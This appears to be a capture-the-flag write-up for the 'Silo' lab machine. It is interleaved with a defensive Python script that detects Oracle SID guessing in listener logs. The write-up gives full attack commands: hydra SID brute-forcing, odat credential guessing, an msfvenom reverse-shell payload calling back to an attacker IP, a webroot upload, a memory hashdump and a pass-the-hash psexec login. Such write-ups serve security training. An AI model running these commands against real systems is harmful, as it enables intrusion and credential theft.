Silo Write-up

Welcome to my Silo Write-up

Recon

Nmap

$ sudo nmap -p- -Pn -sS 10.10.10.82

Nmap scan report for 10.10.10.82 (10.10.10.82)
Host is up (0.069s latency).
Not shown: 65520 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1521/tcp  open  oracle
5985/tcp  open  wsman
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49159/tcp open  unknown
49160/tcp open  unknown
49161/tcp open  unknown
49162/tcp open  unknown
$ sudo nmap -sSVC -A -oA nmap/silo 10.10.10.82

Nmap scan report for 10.10.10.82 (10.10.10.82)
Host is up (0.056s latency).
Not shown: 988 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=7/5%OT=80%CT=1%CU=40842%PV=Y%DS=2%DC=T%G=Y%TM=64A5BCD9
...

Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-07-05T18:56:13
|_  start_date: 2023-07-05T18:53:23
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode: 
|   302: 
|_    Message signing enabled but not required
|_clock-skew: mean: -5s, deviation: 0s, median: -5s

SMB

image 1

image 2

Nothing here.

PORT 80

image 3

$ ffuf -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.82/FUZZ

    /'___\  /'___\           /'___\       
   /\ \__/ /\ \__/  __  __  /\ \__/       
   \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
    \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
     \ \_\   \ \_\  \ \____/  \ \_\       
      \/_/    \/_/   \/___/    \/_/       

   v2.0.0-dev
________________________________________________

:: Method           : GET
:: URL              : http://10.10.10.82/FUZZ
:: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Follow redirects : false
:: Calibration      : false
:: Timeout          : 10
:: Threads          : 40
:: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

[Status: 200, Size: 701, Words: 27, Lines: 32, Duration: 63ms]
    * FUZZ: 

[Status: 301, Size: 156, Words: 9, Lines: 2, Duration: 57ms]
    * FUZZ: aspnet_client

Nothing interesting here.

PORT 1521 (ORACLE)

https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener

SID ENUMERATION

What is a SID? The SID (Service Identifier) is essentially the database name. Depending on the install, you may have one or more default SIDs, or even a totally custom, DBA-defined SID. In some old versions (it works on 9) you could simply ask for the SID and the database would send it to you:

$ tnscmd10g status -p 1521 -h 10.10.10.82


image 4

If you can't get the SIDs that way, you will need to brute-force them:

$ hydra -L sids-oracle.txt -s 1521 10.10.10.82 oracle-sid


image 5
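The flip side of the SID enumeration above is what it leaves in the Oracle listener log: a burst of "establish" records from one source host, each rejected with return code 12505 (listener does not know the requested SID), often followed by a successful connect once the right SID is hit. The following detection is an added example, not part of the original write-up; the log lines are constructed in the shape of Oracle listener.log establish records, and the threshold and window are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample shaped like Oracle listener.log "establish" records:
# timestamp * CONNECT_DATA * ADDRESS * establish * service * return code
# (0 = connection handed to the instance, 12505 = listener does not know that SID).
SAMPLE_LOG = """\
05-JAN-2018 22:18:01 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=)(HOST=kali)(USER=root))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.2)(PORT=40001)) * establish * ORCL * 12505
05-JAN-2018 22:18:01 * (CONNECT_DATA=(SID=PROD)(CID=(PROGRAM=)(HOST=kali)(USER=root))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.2)(PORT=40002)) * establish * PROD * 12505
05-JAN-2018 22:18:02 * (CONNECT_DATA=(SID=TEST)(CID=(PROGRAM=)(HOST=kali)(USER=root))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.2)(PORT=40003)) * establish * TEST * 12505
05-JAN-2018 22:18:02 * (CONNECT_DATA=(SID=DEV)(CID=(PROGRAM=)(HOST=kali)(USER=root))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.2)(PORT=40004)) * establish * DEV * 12505
05-JAN-2018 22:18:05 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=)(HOST=kali)(USER=root))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.2)(PORT=40006)) * establish * XE * 0
05-JAN-2018 22:18:09 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=app.exe)(HOST=APP01)(USER=svc))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.10.50)(PORT=50112)) * establish * XE * 0
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{2}-[A-Z]{3}-\d{4} \d{2}:\d{2}:\d{2}) \* "
    r"\(CONNECT_DATA=\(SID=(?P<sid>[^)]*)\).*? \* "
    r"\(ADDRESS=.*?\(HOST=(?P<host>[^)]+)\).*? \* establish \* \S+ \* (?P<rc>\d+)$"
)

def parse_establish_records(log_text):
    """Yield (time, source_host, requested_sid, return_code) for each establish record."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield (datetime.strptime(m["ts"], "%d-%b-%Y %H:%M:%S"),
                   m["host"], m["sid"], int(m["rc"]))

def detect_sid_guessing(log_text, threshold=4, window=timedelta(minutes=1)):
    """Flag hosts with >= threshold rejected SIDs inside one window and report
    whether that host connected successfully afterwards (and to which SID)."""
    by_host = defaultdict(list)
    for rec in sorted(parse_establish_records(log_text)):
        by_host[rec[1]].append(rec)
    findings = {}
    for host, recs in by_host.items():
        failures = [r for r in recs if r[3] != 0]
        start = 0
        for end in range(len(failures)):  # sliding window over the rejected lookups
            while failures[end][0] - failures[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                findings[host] = {"rejected_lookups": len(failures),
                                  "guessed_sids": sorted({r[2] for r in failures}),
                                  "succeeded_with": sorted({r[2] for r in recs if r[3] == 0 and r[0] >= failures[end][0]})}
                break
    return findings
```

The legitimate client at 10.10.10.50 connects straight to XE and is never flagged; the guessing host is reported together with the SID it eventually reached.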

Make sure you have odat installed; here is the link.

$ ./odat-linux-libc2.17-x86_64 all -s 10.10.10.82 -p 1521


Running the command I found valid credentials:

SID: XE

USERNAME: scott

PASSWORD: tiger

First we need to install Oracle's sqlplus client on Kali.

$ sqlplus scott/tiger@10.10.10.82:1521/XE 'as sysdba';


image 7

Let’s create a user and grant it privileges.

SQL> create user taha identified by password;

SQL> grant sysdba to taha;

SQL> grant dba to taha;

image 8

Initial Foothold (Arbitrary File Upload)

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=1234 -f aspx > shell.aspx


image 9

Now we are going to use the account that we created to upload a shell.

$ odat dbmsxslprocessor -s 10.10.10.82 -d XE -U taha -P password --putFile "C:\inetpub\wwwroot" "shell.aspx" "/home/thehunt/Desktop/exploits/shell.aspx" --sysdba


image 10

Open http://10.10.10.82/shell.aspx

image 11

Privilege Escalation

In C:\Users\Phineas\Desktop I found:

image 12

image 13

Copy the link https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0 and use the password £%Hm8646uC$ that we found:

image 14

Let’s go to Dropbox and download the file. I got a zip file; I extracted it and got a memory dump. Let’s analyse it using Volatility (you can install it using this link: install). I ran this command to check the profile:

$ volatility -f SILO-20180105-221806.dmp imageinfo


I got a lot of suggestions. Running systeminfo on the remote machine gives us the OS name: Microsoft Windows Server 2012 R2 Standard, so I’ll use the Win2012R2x64 profile. First, let’s try hashdump and see if we can get the Administrator hash:

$ volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 hashdump


# impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 Administrator@silo.htb


image 15

This post is licensed under CC BY 4.0 by the author.